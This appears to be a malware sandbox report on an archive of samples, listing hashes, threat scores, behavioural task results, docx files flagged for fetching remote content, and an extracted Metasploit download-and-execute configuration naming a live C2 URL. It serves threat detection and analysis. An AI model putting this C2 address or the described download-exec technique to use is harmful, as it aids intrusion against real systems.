Overview

overview

10

Static

static

3

MsiZap.exe

windows7-x64

3

MsiZap.exe

windows10-2004-x64

3

adfind.exe

windows7-x64

3

adfind.exe

windows10-2004-x64

3

croperdate.dll

windows7-x64

3

croperdate.dll

windows10-2004-x64

3

croperdate.exe

windows7-x64

10

croperdate.exe

windows10-2004-x64

10

croperdate64.dll

windows7-x64

1

croperdate64.dll

windows10-2004-x64

1

doc_main_0.docx

windows7-x64

7

doc_main_0.docx

windows10-2004-x64

1

doc_main_1.docx

windows7-x64

7

doc_main_1.docx

windows10-2004-x64

1

doc_main_10.docx

windows7-x64

7

doc_main_10.docx

windows10-2004-x64

1

doc_main_11.docx

windows7-x64

7

doc_main_11.docx

windows10-2004-x64

1

doc_main_12.docx

windows7-x64

7

doc_main_12.docx

windows10-2004-x64

1

doc_main_13.docx

windows7-x64

7

doc_main_13.docx

windows10-2004-x64

1

doc_main_14.docx

windows7-x64

7

doc_main_14.docx

windows10-2004-x64

1

doc_main_15.docx

windows7-x64

7

doc_main_15.docx

windows10-2004-x64

1

doc_main_16.docx

windows7-x64

7

doc_main_16.docx

windows10-2004-x64

1

doc_main_17.docx

windows7-x64

7

doc_main_17.docx

windows10-2004-x64

1

doc_main_18.docx

windows7-x64

7

doc_main_18.docx

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    JaffaCakes118_270248e6a629a7d47374cf2c8a172000ca6790c7ab7e90eac0fdbac902122958

  • Size

    5.8MB

  • Sample

    241224-ml969svnbz

  • MD5

    9cee3ed351f503d03da28319d1a9acf6

  • SHA1

    58806175875390a446c1366512e0680711dee087

  • SHA256

    270248e6a629a7d47374cf2c8a172000ca6790c7ab7e90eac0fdbac902122958

  • SHA512

    ecdabad137321d2860b9d76c3ceef11b758f6d196c0b55c21735e5d9bbcfe49f63f07c325e18c1a723f6aac09145cb6f7347960c7d842fe331c4f289792550b8

  • SSDEEP

    98304:/o7ykqZ9PnFMEbnecNecNecNecDecKeczecXecxecmecgnecdec0eck9ecjMQecr:/1kutnOYnecNecNecNecDecKeczecXe8

Score
10/10
metasploitbackdoordiscoverytrojan

Malware Config

Extracted

Family

metasploit

Version

windows/download_exec

C2

http://croperdate.com:443/jquery-3.3.1.slim.min.js

Targets

    • Target

      MsiZap.exe

    • Size

      92KB

    • MD5

      27d4bcc325306b1415a89de550528e04

    • SHA1

      bd3bd0bb8d2ec2637b1b74eb9bffa49da7ff3ce9

    • SHA256

      c8089b1734f68420e912978ac0dd29d8772b1f527d2bffbaaa9d3fad9f4051e5

    • SHA512

      d8c398e84a884a2c0d7b38022b76a46868e3e3ad0a01b7ba188c7fff208a4c79c1c31c14b6053f4f029c59b15c9bf01e145fb1c7f7dcb633c33c2c88428bc9a6

    • SSDEEP

      1536:qfj8y4M/9QlSftZfik16gFy4K6g0hzxddrKjBPtF:qfgq9Q8fikcgXtdYBPtF

    Score
    3/10
    discovery
    behavioral1behavioral2

    • Target

      adfind.exe

    • Size

      1.1MB

    • MD5

      df5ce1159ef2e257df92e1825d786d87

    • SHA1

      a7e163eaa0fc2afb9c0d5ac6f79cb3e49919dd3c

    • SHA256

      842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031

    • SHA512

      4e08bc2ab8602356a025fc293ad997c893adf5a4dcaaef304b0e5110da8f8f489af49286b1a90209244bbb1114fb974dae8f63eb26e7a1fe275a9a5b99834fab

    • SSDEEP

      24576:LOTX2KCv3hoGjmxMO55Hl+rcTopkXcLF6iZi/ZfD3OhkMwn0tB1d5Cxzjzq:Zv3hXjAHlIcToTLM+hZw0tB1d5Cxzjzq

    Score
    3/10
    discovery
    behavioral3behavioral4

    • Target

      croperdate.dll

    • Size

      449KB

    • MD5

      98e69c1a57bfa28abfd0b18c7a30cb28

    • SHA1

      fa7340dc50ecf15ef6bf5f8bb306bec74fd4130d

    • SHA256

      55822cc7e26fd8ba5d782eae68b2171b6551815f1f6eb5334ae0fcddbee70d39

    • SHA512

      435c79726899f3c4976eaabb010e2791d0048b8a78724d8bf8dce2b18293065e6d72440bf57d1bab7a34773acfd625bb964a4908c4a6fbc913d183b2b8f50f78

    • SSDEEP

      6144:4oopl2EeNVPzsVtfEQXC21T12Tk03AgMTXyETmK8FkpWqP+aeSScJ1W1Llw:4bdikTXyEDVpLUSSA1+lw

    Score
    3/10
    discovery
    behavioral5behavioral6

    • Target

      croperdate.exe

    • Size

      449KB

    • MD5

      2c6dc8328a7c2c00ae5e212b5d2eaff7

    • SHA1

      84ffbfa6651f591c21a65248835ec89669e72436

    • SHA256

      9d07fcd85ddccbc95db0c0d1bcdcc541f6edbf1c236deb6b1184217c13b1dd69

    • SHA512

      f86c276cd97e777694daad312277914d0f4b8a076f231f180543a93e354ce42f171cf0222f22d9ef405989f344229b190c17599bdcbf9c32e2ea2ae943ce9071

    • SSDEEP

      6144:n123oleZt8qLFxsQjJ1svZba6NVzh+JGO/I4tNlOJ9aeSScjOA:n1ETG8h5tNM9SSSO

    Score
    10/10
    metasploitbackdoordiscoverytrojan

    • MetaSploit

      Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

      trojanbackdoormetasploit

    • Metasploit family

      metasploit
    behavioral7behavioral8

    • Target

      croperdate64.dll

    • Size

      530KB

    • MD5

      67c916ed405a3163d19f7642734d94be

    • SHA1

      6f0edb57f316fd75a96c1365e7408cc51b165c1a

    • SHA256

      1b981b4f1801c31551d20a0a5aee7548ec169d7af5dbcee549aa803aeea461a0

    • SHA512

      bf161b112b0bf5364a2ad47a76cc8f15c57667c19d4803bedb917cd0dacf8528c480643c170f9c545b3f5493d066ba96854fdec8a234824323644e36647735a6

    • SSDEEP

      6144:p9JMYIo3xsB8t+IvnEzGfuMpph7sB3HR1mlE+caeSScJ1:nJRBRpVsRMETSSA1

    Score
    1/10
    behavioral10behavioral9

    • Target

      doc_main_0.docx

    • Size

      113KB

    • MD5

      8378772899278be4e5765a4c37d13b4d

    • SHA1

      cf4fc162064e10d57e6be49ec298011497eaae2f

    • SHA256

      71a948fcd9738c2762860dc25841a6eca1e23c9b372a3bb764359f29ba5782ed

    • SHA512

      a0be03ca85dacce9e883c4946a3cdd35f31d34a9f86958825036d6f51526454dafb4a98a95311b6e649a054a099e96645da8dc7f6cb030d67641168decaeea34

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZYu:PLvB83+cySlVYmLNu

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral11behavioral12

    • Target

      doc_main_1.docx

    • Size

      121KB

    • MD5

      0da59de6dd4b145c23f14c4592031515

    • SHA1

      933eed6827b6f49a0f9b2c1af1fe838c39e4cfa2

    • SHA256

      ff34dd776636f1e13ece8e4ae6ce31e10dbae28e4b8b15c37ff9655ea79a42b9

    • SHA512

      490957ee59aa940535113e10caed00456aad37442366796a6eeb6d0d8c9c5e506d83b33ad4059715cec562a21ca58b9656926355305c3ed11c4cac4b9171d434

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZtBpFoq7To:PLvB83+cySlVYmLioq7To

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral13behavioral14

    • Target

      doc_main_10.docx

    • Size

      112KB

    • MD5

      7b55e7c7dcaecc70fcc4264559ea9c09

    • SHA1

      f55723625379fe506ac98da30590f27f932e5b15

    • SHA256

      1703116eca314f5776d7a78d5f5dc9d4263f22a688d162593ae237c1ba790fb3

    • SHA512

      1100357cc67ebea9cc6ccc6259b52b3073509530be3c23d2d11e68d0988f240c721c870dafd3c2bf25537b68ec6bcfb5822e214a90492bb3435515b42b9d721e

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZFQ3:PLvB83+cySlVYmLP3

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral15behavioral16

    • Target

      doc_main_11.docx

    • Size

      107KB

    • MD5

      282cfbf72c087eeee07d50f1d753f81b

    • SHA1

      29713ca07c8d665a6174195194e8f0addb2c7868

    • SHA256

      f604a6d503515a6adb91cf5c8fb21bd5f4044326717730ee63c25366dbfee3eb

    • SHA512

      20bf47b33b99ba68c3982b3033da87bcaab4108ec679e8cb60e749d60d57543fbf2a29a514771c85fe80fe06f1cc6b81002acf4c48b2a3e17b72755febd08d88

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZRp2:PLvB83+cySlVYmLv

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral17behavioral18

    • Target

      doc_main_12.docx

    • Size

      121KB

    • MD5

      f724ea66b1851e34bc39ca66b5805966

    • SHA1

      95ffbee0b86ccdb740e179d3126a087d4dbc68fa

    • SHA256

      ab1860985d98dc992cd8d33223286b86d70f926e49b99427eb01daedade1ac17

    • SHA512

      3fb0b6a0639f6b8318a3e4e5b7a0eedf30e8198020a17917ea7a58760bbe70025f885c9f2757852ef2fb5dcf0060ff93ba248b3670c07f260abf1d139c881d46

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZxkCw:PLvB83+cySlVYmL6w

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral19behavioral20

    • Target

      doc_main_13.docx

    • Size

      111KB

    • MD5

      9084e4d8ac94932754f159bc8cd1d6d9

    • SHA1

      f79cb584125657f838d93eba298a0a9f03c13788

    • SHA256

      a0b090d191661c0f390d924b084eefa2688ea185fd8eeade4f8718fc6d7dff2b

    • SHA512

      d0c593e2f13321cd2c10bb3d7f4a22dea0dd9c4165cead90ac4f292e34e0d56ae95f040ecf40630884a748522485c6374852238e240a0cb7fc3788690be07d8a

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZHU:PLvB83+cySlVYmL9

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral21behavioral22

    • Target

      doc_main_14.docx

    • Size

      107KB

    • MD5

      22a592907fe0e0b8cf0e76be20c09e27

    • SHA1

      71ba75475b1b33abcb2f55dcd06f232481c2cb90

    • SHA256

      73e3a33304c9d736113ee81e5e205a99bba264de4842c6aa87a03a075ef01149

    • SHA512

      6cd1274dada327ade67c4242cf46107b8b619e163261f2b93900cb0d1a54f06822c22f49287a8c71ff1bb799f1984ccecda3627fd531df242c5174302a252b22

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZd8:PLvB83+cySlVYmL48

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral23behavioral24

    • Target

      doc_main_15.docx

    • Size

      114KB

    • MD5

      7d5f178cb14ebce00f773854c3222bd6

    • SHA1

      dab51bc741f72c1011a4a3b244e8f6f418443c98

    • SHA256

      8c0f28ea5a7cbc63533b7e7d6b1acd29faee6284ab2dfa3cf6b8e19881f4e714

    • SHA512

      2b31a1da9221434077dab5275869f3e2f97fafee1089a716f367f80cfbb6c62d9cb06b85c7be4bb4a9835f61cf3b8e26adda00d988162602890cf16860cd1c11

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZEroAtF5:PLvB83+cySlVYmLGAtF5

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral25behavioral26

    • Target

      doc_main_16.docx

    • Size

      114KB

    • MD5

      d1cd86a4572904aa404db206145ca5e9

    • SHA1

      f23229508e921464239d47847a1ede463ab23f3a

    • SHA256

      cf6de01b3d6fbf8bbf229cd6b0b15dc100fcfdbda8899de0fccb632ff0c72311

    • SHA512

      127a16d3eb9420e0936c7311e6dc85629d894c63b7a259435182ec4229bc1066f58afbd100d46ee8581aa03ee16287fbee2edaf7007e3926cd57a463a5234d7d

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZm:PLvB83+cySlVYmLl

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral27behavioral28

    • Target

      doc_main_17.docx

    • Size

      120KB

    • MD5

      3385539be81277524f7544ec50ec64d2

    • SHA1

      ad9ce8f19e5e9443f4f931b5cfc0ad1a6dd0fa9d

    • SHA256

      88c4e69990bf79f0d77b2d524ed2ec146f8f20e4ecad0a1f39eddd32b3ab3315

    • SHA512

      886f4a61baeb5e00a19638b41a7ae2e497f76faf12a11279f9be1777c9c0784b3647404c5cdd801a0a1cb4d5f5a026664f6c155e42ce5799af247b6b20d674ce

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZJP5zgy:PLvB83+cySlVYmLGPNgy

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral29behavioral30

    • Target

      doc_main_18.docx

    • Size

      116KB

    • MD5

      560414515c152fbaaf795383e3e35f6b

    • SHA1

      374b49e30e71a2ecd37a42ad90208caa9ccca455

    • SHA256

      86e0df0941d6eaf4337e60765bcbb4e543045f1be9bf5d595fcbc3a018772297

    • SHA512

      993ad8a57062a2033b5de64f342667aedf21cc02e371ab1d1e757a3fc0dfcc28a5535a80c5751fef4e32cbb53c7c9def325c2a6e43d042961bd88e1a3a20ddab

    • SSDEEP

      3072:WeBQAhNHh83WrtH8ynSlP2UUQk+CmLSZd/P:PLvB83+cySlVYmLO

    Score
    7/10
    discovery

    • Abuses OpenXML format to download file from external location

    behavioral31behavioral32

MITRE ATT&CK Enterprise v15

Tasks

static1

Score
3/10

behavioral1

discovery
Score
3/10

behavioral2

discovery
Score
3/10

behavioral3

discovery
Score
3/10

behavioral4

discovery
Score
3/10

behavioral5

discovery
Score
3/10

behavioral6

discovery
Score
3/10

behavioral7

metasploitbackdoordiscoverytrojan
Score
10/10

behavioral8

metasploitbackdoordiscoverytrojan
Score
10/10

behavioral9

Score
1/10

behavioral10

Score
1/10

behavioral11

discovery
Score
7/10

behavioral12

Score
1/10

behavioral13

discovery
Score
7/10

behavioral14

Score
1/10

behavioral15

discovery
Score
7/10

behavioral16

Score
1/10

behavioral17

discovery
Score
7/10

behavioral18

Score
1/10

behavioral19

discovery
Score
7/10

behavioral20

Score
1/10

behavioral21

discovery
Score
7/10

behavioral22

Score
1/10

behavioral23

discovery
Score
7/10

behavioral24

Score
1/10

behavioral25

discovery
Score
7/10

behavioral26

Score
1/10

behavioral27

discovery
Score
7/10

behavioral28

Score
1/10

behavioral29

discovery
Score
7/10

behavioral30

Score
1/10

behavioral31

discovery
Score
7/10

behavioral32

Score
1/10